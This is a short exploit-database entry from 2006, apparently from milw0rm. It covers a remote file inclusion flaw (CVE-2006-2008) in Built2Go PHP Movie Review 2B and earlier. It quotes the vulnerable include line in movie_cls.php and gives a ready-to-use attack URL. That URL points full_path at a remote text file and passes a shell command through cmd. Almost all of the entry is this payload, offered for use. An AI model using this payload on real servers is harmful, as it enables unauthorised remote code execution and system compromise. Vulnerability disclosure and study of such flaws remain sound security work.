Author: Camille Myers type: webapps platform: php port: date_added: 2006-04-22 date_updated: verified: 1 codes: OSVDB-24887;CVE-2006-2008 tags: aliases: screenshot_url: application_url:
Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability
in movie_cls.php
# require_once("$full_path/review_cls.php");
usage:
# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a
# milw0rm.com [2006-04-23]